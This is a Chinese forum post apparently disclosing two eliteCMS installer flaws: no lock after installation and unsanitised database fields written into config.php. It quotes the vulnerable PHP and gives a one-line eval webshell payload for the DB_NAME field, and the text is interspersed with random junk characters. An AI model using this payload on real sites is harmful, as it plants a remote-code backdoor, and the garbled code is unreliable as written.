eliteCMS的安装程序安装结束后未作锁定,导致黑客可以通过访问安装程序地址进行重复安装, U& U1 T1 y' b% f) m! {
2 W. y; z7 y- H
另外一个漏洞是安装程序可以直接写入一句话到admin/includes/config.php
+ u* R+ `) {: y0 W6 U我们来看代码:
x X5 I" ~: U
/ y. v. I' H3 R0 I, I/ s7 p0 \...
J j O( o3 l5 D" q8 k1 T9 \: nelseif ($_GET['step'] == "4") {
1 r; ^3 h+ j$ w- E% e% y" n- K $file = "../admin/includes/config.php";
) _2 N0 @' Q9 d5 A& x' G5 V $write = "<?php\n";
^9 f5 \ m0 [6 ~4 \ $write .= "/**\n";
; N( w3 l! j, T# ]% i6 w/ \ $write .= "*\n";5 J2 {" g- D. A( U* o1 w
$write .= "*eliteCMS-The LightweightCMS Copyright 2008 elite-graphix.net.\n";
. p5 T0 `9 r1 K( x- A; |...略...
C3 C; I4 H# l s2 O t, M $write .= "*\n";
' c9 u4 L7 r2 Z, [2 e" W $write .= "*/\n";
) n6 K- y* \, j5 F! g4 L $write .= "\n";) Z6 K$ Z) Q9 m* e1 h: c
$write .= "define(\"DB_SERVER\", \"{$_SESSION['DB_SERVER']}\");\n";4 p6 [- R; {! \, a
$write .= "define(\"DB_NAME\", \"{$_SESSION['DB_NAME']}\");\n";2 Z. g. P8 F6 k- A$ z: e' y
$write .= "define(\"DB_USER\", \"{$_SESSION['DB_USER']}\");\n";
* `. I9 |8 V; v* ~- L' Y% | ^ $write .= "define(\"DB_PASS\", \"{$_SESSION['DB_PASS']}\");\n";: t8 ^& o5 j1 O" I
$write .= "\$connection = mysql_connect(DB_SERVER, DB_USER, DB_PASS);\n";4 b2 O3 k7 L. a$ X, m$ A5 `
$write .= "if (!\$connection) {\n";
, S& f5 n. W$ ~/ m $write .= " die(\"Database connection failed\" .mysql_error());\n";
* y: u2 i0 D3 w! M! t $write .= " \n";
( h+ o8 q8 a4 y $write .= "} \n";
9 w: B6 L. d, Z( ~: h+ E $write .= "\$db_select = mysql_select_db(DB_NAME, \$connection);\n";- U3 R0 E I4 e. F; R
$write .= "if (!\$db_select) {\n";
8 M6 |, [& n0 p- D U; E* [* P $write .= " die(\"Database select failed\" .mysql_error());\n"; c5 a- t) L6 c2 r; ~
$write .= " \n";
; k! H _! Z2 K. g7 B9 { $write .= "} \n";) k8 @+ x/ C* N7 Z/ a4 r' B0 s; M
$write .= "?>\n";" t+ f6 m. \8 N. O" @: Z* j
+ H* k% V, m3 S
$writer = fopen($file, 'w');! d: S7 ?! J, [9 U3 u- y
...& f2 \/ i, }8 k! e; J/ r: i5 A
5 y' T0 i! T1 @ o$ T在看代码:$ b7 E: F2 K+ \& B
: ^; P, b8 p' U; S. o0 P# ^' E$_SESSION['DB_SERVER'] = $_POST['DB_SERVER'];
8 E- J% V% N% V2 Z4 \$_SESSION['DB_NAME'] = $_POST['DB_NAME'];" N7 G: D" F; q3 d( S1 O6 Y
$_SESSION['DB_USER'] = $_POST['DB_USER'];
4 Z" C* W ]" g# p9 b$_SESSION['DB_PASS'] = $_POST['DB_PASS'];, z/ b( r3 Y& |5 @ D
5 s. I5 o _: f( t% s取值未作任何验证& t/ a7 P3 W* |: w
如果将数据库名POST数据:
! N- e b) w3 `; M/ f3 r
8 t5 w0 h$ P9 F3 ]' |7 q& T& ~"?><?php eval($_POST[c]);?><?php
! h& e/ @$ o7 e
5 n: ~9 o+ }4 K u- w( g1 v将导致一句话后门写入/admin/includes/config.php y, `' c7 I j) X0 w; V! T
|
发表于 2012-11-18 13:59:27
收藏
支持
反对